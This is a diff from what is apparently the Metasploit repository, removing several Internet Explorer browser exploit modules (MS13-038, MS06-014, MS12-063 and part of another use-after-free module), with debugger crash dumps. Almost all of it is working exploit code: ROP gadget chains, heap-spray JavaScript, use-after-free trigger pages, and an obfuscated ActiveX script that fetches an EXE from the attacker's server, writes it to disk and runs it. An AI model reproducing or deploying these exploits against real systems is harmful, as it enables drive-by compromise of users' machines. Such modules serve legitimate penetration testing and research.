nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Make post code execution more stable
code << rand_text_alpha(12000)
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_payload = ''
case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
when 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
end
else
rop_payload = generate_rop_payload('java', java_align + code)
end
rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld() {
e_form = document.getElementById("formelm");
e_div = document.getElementById("divelm");
for(i =0; i < 20; i++) {
document.createElement('button');
}
e_div.appendChild(document.createElement('button'));
e_div.firstChild.applyElement(e_form);
e_div.innerHTML = "";
e_div.appendChild(document.createElement('body'));
CollectGarbage();
p = unescape("#{padding}");
for (i=0; i < 3; i++) {
p += unescape("#{padding}");
}
p += unescape("#{js_payload}");
fo = unescape("#{align_esp}");
for (i=0; i < 55; i++) {
if (i == 54) { fo += unescape("#{xchg_esp}"); }
else { fo += unescape("#{align_esp}"); }
}
fo += p;
mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld())">
<t:ANIMATECOLOR id="myanim"/>
<div id="divelm"></div>
<form id="formelm">
</form>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(87c.f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
0:008> k
ChildEBP RetAddr
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
020bffec 00000000 kernel32!BaseThreadStart+0x37
0:008> r
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????
=end

232
modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View File

@ -1,232 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CGenericElement object is freed, but a
reference is kept on the Document and used again during rendering, an invalid
memory that's controllable is used, and allows arbitrary code execution under the
context of the user.
Please note: This vulnerability has been exploited in the wild on 2013 May, in
the compromise of the Department of Labor (DoL) Website.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown',
'EMH',
'juan vazquez', #RCA
'sinn3r' #RCA
],
'References' =>
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'MSB', 'MS13-038' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
],
'Privileged' => false,
'DisclosureDate' => "May 3 2013",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def get_payload(t, cli)
rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop']
when :msvcrt
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
elsif t.name == 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
end
else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << p
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)
end
return rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
document.body.contentEditable="true";
f0 = document.createElement('span');
f1 = document.createElement('span');
f2 = document.createElement('span');
document.body.appendChild(f0);
document.body.appendChild(f1);
document.body.appendChild(f2);
for (i=0; i < 20; i++) { document.createElement("img"); }
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
CollectGarbage();
f1.appendChild(document.createElement('table'));
try { f0.offsetParent=null;}
catch(e) { }
f2.innerHTML = "";
f1.innerHTML = "";
f0.appendChild(document.createElement('hr'));
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end

263
modules/exploits/windows/browser/ie_createobject.rb
View File

@ -1,263 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
# this, but by default they throw an ugly popup that stops all script
# execution until the user deals with it and aborts everything if they
# click "no". Not worth the risk of being unable to try more recent
# exploits. Make sure service packs on top of 6.0 are considered less
# than the max by setting to 6.1 (which doesn't really exist).
:ua_maxver => "6.1",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:method => [ 'CreateObject', 'GetObject' ],
:classid =>
[
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
],
#:rank => ExcellentRanking # reliable exe writer
})
def initialize(info = {})
super(update_info(info,
'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',
'Description' => %q{
This module exploits a generic code execution vulnerability in Internet
Explorer by abusing vulnerable ActiveX objects.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm',
],
'References' =>
[
# MDAC
[ 'MSB', 'MS06-014' ],
[ 'CVE', '2006-0003' ],
[ 'OSVDB', '24517' ],
# WMI Object Broker
[ 'MSB', 'MS06-073' ],
[ 'CVE', '2006-4704' ],
[ 'OSVDB', '30155' ],
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# Patched
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
# Found in mpack
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
# Patched
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
# Visual Studio components, not marked as safe
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
#
# The controls below can launch the "installing component" dialogs...
#
# Not marked as safe
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
# Not marked as safe
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
# Found exploitable in the wild (no details)
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 11 2006'))
end
def on_request_uri(cli, request)
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Build out the HTML response page
var_html = rand_text_alpha(rand(30)+2)
var_func_exploit = rand_text_alpha(rand(30)+2);
var_func_go = rand_text_alpha(rand(30)+2);
var_func_createo = rand_text_alpha(rand(30)+2);
var_exe_name = rand_text_alpha(rand(30)+2);
var_objects = ''
# Build the object list based on target selection
if (target.name == 'Automatic')
targets.each do |t|
next if not t['CLSID']
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
end
else
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
end
content = %Q^
<html><head><title></title>
<script language="javascript">
function #{var_func_createo}( o , n ) {
var r = null;
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
}
if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
}
return( r );
}
function #{var_func_go}( a ) {
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );
var e = s.Environment( "P" + "ro" + "ce" + "ss" );
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
var xml = null;
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xml) {
return(0);
}
xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;
o.Type = 1 ;
o.Mode = 3 ;
o.Open ( ) ;
o.Write ( dat ) ;
o.SaveToFile ( bin, 2) ;
s.Run ( bin , 0 );
}
function #{var_func_exploit}( ) {
var i = 0;
var t = new Array( #{var_objects} null );
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
if (b) {
#{var_func_go}( a ) ;
return(0) ;
}
} catch(e){
}
}
i++;
}
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>
^
content = Rex::Text.randomize_space(content)
print_status("Sending exploit HTML...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

389
modules/exploits/windows/browser/ie_execcommand_uaf.rb
View File

@ -1,389 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "9.0",
:javascript => true,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
to a use-after-free condition.
Please note that this vulnerability has been exploited in the wild since Sep 14 2012.
Also note that presently, this module has some target dependencies for the ROP chain to be
valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).
For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which
is often the case).
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # via ZDI
'eromang', # First public discovery
'binjo',
'sinn3r', # Metasploit
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2012-4969' ],
[ 'OSVDB', '85532' ],
[ 'MSB', 'MS12-063' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ]
],
'Payload' =>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]
],
'Privileged' => false,
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
vprint_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
stack_pivot = [
0x77c4e393, # RETN
0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
if t['Random']
stack_pivot = [
0x0c0c0c0c, # 0c0c0c08
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
else
stack_pivot = [
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
end
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end
return rop_payload
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset_length = #{t['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
JS
end
def load_html1(cli, my_target)
p = get_payload(my_target, cli)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if my_target['Random']
js = get_random_spray(my_target, js_code, js_r_nops)
else
js = get_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = %Q|
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
</script>
<iframe src="#{this_resource}/#{@html2_name}"></iframe>
<script>
#{js}
</script>
</body>
</html>
|
return html
end
def load_html2
html = %Q|
<HTML>
<script>
function funcB() {
document.execCommand("selectAll");
};
function funcA() {
document.write("#{Rex::Text.rand_text_alpha(1)}");
parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
a
</div>
</body>
</HTML>
|
return html
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def on_request_uri(cli, request)
uri = request.uri
agent = request.headers['User-Agent']
my_target = get_target(agent)
vprint_status("Requesting: #{uri}")
print_status(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}")
send_not_found(cli)
return
end
if uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}")
html = load_html2
elsif uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target)
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}")
return
else
send_not_found(cli)
return
end
html = html.gsub(/^ {4}/, '')
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
super
end
end
=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07 mov eax,dword ptr [edi]
637d4650 57 push edi
637d4651 ff5008 call dword ptr [eax+8]
0:008> k
ChildEBP RetAddr
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
